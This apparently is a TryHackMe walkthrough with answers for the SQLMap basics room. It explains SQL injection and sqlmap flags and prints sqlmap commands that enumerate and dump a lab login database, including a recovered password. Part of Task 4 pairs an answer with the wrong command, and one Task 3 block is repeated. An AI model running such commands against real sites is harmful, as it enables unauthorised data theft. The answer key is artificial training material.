TryHackMe SQLMap: The Basics Walkthrough – Step-by-Step Guide

calender-iconPublished: 1 Jan 2026

clock-icon5-min read

printer-icon whatsapp-icon share-icon



Table of Contents

INTRODUCTION



Task 1: Introduction

Q. Which language builds the interaction between a website and its database?
A. Sql

Explanation: - SQL is a language used to to talk to databases. It helps you store, find, update, and delete data.



Task 2: SQL Injection Vulnerability

Q1. Which boolean operator checks if at least one side of the operator is true for the condition to be true?
A1. OR


Q2. Is 1=1 in an SQL query always true? (YEA/NAY)
A2. YEA


Explanation
The boolean operator OR is used to evaluate multiple conditions where only one condition needs to be true for the overall expression to be true.
If either the left side or the right side of the operator evaluates to true, the entire condition becomes true. The result is false only when both conditions are false.

1 = 1 is a condition that always evaluates to true in SQL because both sides of the comparison are identical. The database does not depend on any table data to evaluate it, so the condition is true for every row.
Because of this behavior, 1=1 is commonly abused in SQL injection attacks to force a query to return results or bypass logical checks, such as authentication conditions.



Task 3: Automated SQL Injection Tool

Q-1. Which flag in the SQLMap tool is used to extract all the databases available?
A-1. --dbs

Q-2. What would be the full command of SQLMap for extracting all tables from the "members" database? (Vulnerable URL: http://sqlmaptesting.thm/search/cat=1)
A-2. sqlmap -u 'http://sqlmaptesting.thm/search/cat=1' -D members --tables



Explanation:
SQLMap is an automated, open-source command-line tool used to detect and exploit SQL injection vulnerabilities in web applications. It automatically tests parameters, identifies the database type, and extracts data if a vulnerability exists.

Flags
-u → specify URL
--dbs → list databases
-D database_name --tables → List all tables
-D database_name -T table_name --dump → table records



Task 4: Practical Exercise

Q-1. How many databases are available in this web application?
A-1. 6

Command Used
sqlmap -u 'http://10.49.157.138/ai/includes/user_login?email=test&password=test' --dbs



Q-2. What is the name of the table available in the "ai" database?
A-2. user

Command Used
sqlmap -u 'http://10.49.157.138/ai/includes/user_login?email=test&password=test' --dbs



Q-3. What is the password of the email test@chatai.com?
A-3. 12345678

Command Used
command - sqlmap -u 'http://10.49.157.138/ai/includes/user_login?email=test&password=test' -D ai -T user --dump

Q. What would be the full command of SQLMap for extracting all tables from the "members" database? (Vulnerable URL: http://sqlmaptesting.thm/search/cat=1)
A. sqlmap -u 'http://sqlmaptesting.thm/search/cat=1' -D members --tables



Explanation:
SQLMap is an automated, open-source command-line tool used to detect and exploit SQL injection vulnerabilities in web applications. It automatically tests parameters, identifies the database type, and extracts data if a vulnerability exists.

Flags
-u → specify URL
--dbs → list databases
-D database_name --tables → List all tables
-D database_name -T table_name --dump → table records